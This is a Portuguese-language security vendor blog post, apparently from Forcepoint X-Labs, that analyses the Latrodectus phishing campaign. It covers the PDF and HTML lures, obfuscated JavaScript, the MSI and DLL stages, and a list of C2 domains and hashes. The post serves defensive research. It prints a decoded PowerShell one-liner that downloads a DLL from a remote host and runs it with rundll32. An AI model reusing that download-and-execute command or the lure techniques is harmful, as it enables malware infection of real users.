Ir para o conteúdo principal

Dentro da Campanha de Malware Latrodectus

Phishing tradicional encontra inovação na entrega de payloads

|

0 minutos de leitura

Get a Demo of Forcepoint Solutions

Este relatório oferece uma análise detalhada da recente atividade da campanha Latrodectus, descoberta pela nossa equipe de pesquisa do X-Labs. Uma das principais técnicas de disseminação do Latrodectus envolve e-mails de phishing, aproveitando infraestruturas como a do IcedID.

O Latrodectus tem como alvo principal os setores financeiros, automotivo e de saúde. Ao comprometer contas de e-mail e distribuir anexos maliciosos, ele se propaga por uma rede mais ampla de alvos potenciais.

Atualmente, os agentes de ameaça estão adotando cada vez mais o Latrodectus, utilizando formatos de anexo prevalentes, como HTML e PDF. Ele é projetado para ser furtivo e persistente, complicando os esforços de detecção e erradicação. Isso pode levar à exfiltração de dados pessoais, perdas financeiras devido a fraudes ou extorsão, e ao comprometimento de informações sensíveis.

A campanha Latrodectus inicia-se com ataques originados de um e-mail comprometido que aparenta conter documentos críticos do DocuSign. Os usuários são incentivados a acessar o documento por meio do link fornecido. Quando o link é clicado, os usuários são redirecionados para uma URL maliciosa, resultando no download inadvertido do payload da próxima etapa.

Fig. 1 - Cadeia de Ataque

Fig. 2 - Acesso Inicial ao PDF

Fig. 3 - URL suspeita incorporada em PDF

O PDF contém domínio comprometido com redirecionamento:
“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”

Ele redireciona para URLs encurtadas e, em seguida, para outro domínio suspeito:

 “hxxps://digitalpinnaclepub[.]com/?3” e, finalmente, redireciona para o projeto do “storage.googleapis.com”“hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”

Análise do JavaScript Ofuscado

  • O JavaScript contém muitas mensagens lixo em “//”, o que aumenta a ofuscação e o tamanho do arquivo. O código JavaScript malicioso real está comentado em “////”.

Fig. 4 - Carga útil de JavaScript ofuscada

  • Após remover as mensagens lixo, é exibida a manipulação de strings ofuscadas do JavaScript com funções de substituição e junção. Substituindo “////” por um espaço (“ ”), o código malicioso real é revelado.

Fig. 5 - Funções de manipulação de strings Javascript desofuscadas

  • Após a desofuscação, ele cria ActiveXObject("WindowsInstaller.Installer") e baixa um arquivo instalador .msi. Veja a Fig. 6 abaixo:

 Fig. 6  - Código Javascript desofuscado baixa arquivo MSI

 

Análise do MSI

  • O arquivo MSI é executado via JavaScript e faz o drop de um arquivo malicioso .dll de 64 bits na pasta %appdata%.

Fig. 7 - Arquivo MSI

  • O .dll dropado contém a função de exportação “GetDeepDVCState”, e o MSI executa este .dll com o parâmetro: “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState”

 

Análise do DLL

  • O DLL é um binário Microsoft Visual C++ de 64 bits com informações falsas de versão da NVIDIA.

Fig. 8 - Informações da versão DLL

  • Este DLL desempacota outro payload DLL de estágio na memória:

 Fig. 9 - Informações da versão DLL

O binário DLL desempacotado de 64 bits conecta-se a um servidor C2 malicioso em uma porta incomum, 8041.

Greshunka[.]com:8041/bazar.php

Acesso Inicial via HTML

A página HTML de phishing parece um pop-up de documento Word para o usuário. Clicar no botão executa código JavaScript malicioso incorporado no HTML. Veja a Fig. 10 abaixo:

Fig. 10  - Anexo HTML

Ela contém mensagens de aviso em pop-up em ordem invertida:

document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');

Mensagem revertida:

Your browser does not support correct offline display of this document. Please follow the instructions below using the

O código também utiliza diferentes funções de codificação de strings, como window.atob(), e funções de ofuscação, como s.split("").reverse().join("");

Fig. 11 - Código Suspeito em HTML

Código Base64 Decodificado

cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8==

Isso mostra que os agentes de ameaça tentam usar HTML para iniciar o PowerShell, baixar diretamente o payload DLL sem MSI e executá-lo com rundll32.exe, conectando-se ao C2. Observamos algumas campanhas com anexos HTML em e-mails comprometidos.

Conclusão

Os agentes de ameaça continuam a usar e-mails antigos para atacar usuários por meio de anexos suspeitos em PDF ou HTML. Eles utilizam um método de redirecionamento com encurtadores de URL e hospedam payloads maliciosos em projetos conhecidos do storage[.]googleapis[.]com. Posteriormente, baixam JavaScript ofuscado para fazer download do MSI e utilizam rundll32.exe para executar DLLs de 64 bits.

Esta campanha combina o antigo com o novo. O Latrodectus aproveita infraestruturas antigas combinadas com um método inovador de distribuição de payloads maliciosos para os setores financeiro, automotivo e de negócios.

Declaração de proteção

Os clientes da Forcepoint estão protegidos contra esta ameaça nos seguintes estágios de ataque:

  • Estágio 2 (Isca): Anexos PDF e HTML maliciosos associados a esses ataques são identificados e bloqueados.
  • Estágio 3 (Redirecionamento): URLs encurtadas de redirecionamento e domínios comprometidos são bloqueados.
  • Estágio 5 (Arquivo Dropper): Os arquivos dropper são adicionados ao banco de dados de malwares da Forcepoint e bloqueados.
  • Estágio 6 (Comunicação com C2): Credenciais C2 bloqueadas.

IOCs

URLs de Estágio Inicial:

  • hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://digitalpinnaclepub[.]com/?3
  • hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js
  • hxxp://194[.]54[.]156[.]91/dsa.msi
  • hxxp://gertioma[.]top/o.jpg

C2s:

  • tiguanin[.]com
  • greshunka[.]com
  • bazarunet[.]com
  • mazinom[.]com
  • leroboy[.]com
  • krinzhodom[.]com
  • klemanzino[.]net
  • rilomenifis[.]com
  • isomicrotich[.]com

 

Hashes:

  • 35A990C3BE798108C9D12A47F4A028468EA6095B
  • 9361621490915EBB919B79C6101874F03E4E51BC
  • 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949
  • 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
  • 62e23500cc5368e37be47371342784f72e481647
  • 881993bcb37aa9504249271b7559addc0c633f09
  • 7474873629399ee5fdd984c99b705e0490ab8707
  • mayur-sewani.jpg

    Mayur Sewani

    Mayur atua como Pesquisador Sênior de Segurança na equipe de pesquisa Forcepoint X-Labs. Ele se concentra em malwares APT, ladrões de informações, ataques de phishing e trabalha para se manter atualizado com as ameaças mais recentes. Ele é apaixonado por avançar no campo da emulação de adversários defensivos e pesquisa.

    Leia mais artigos de Mayur Sewani

    No Artigo

    X-Labs

    Get insight, analysis & news straight to your inbox

    Ao Ponto

    Cibersegurança

    Um podcast que cobre as últimas tendências e tópicos no mundo da cibersegurança

    Ouça Agora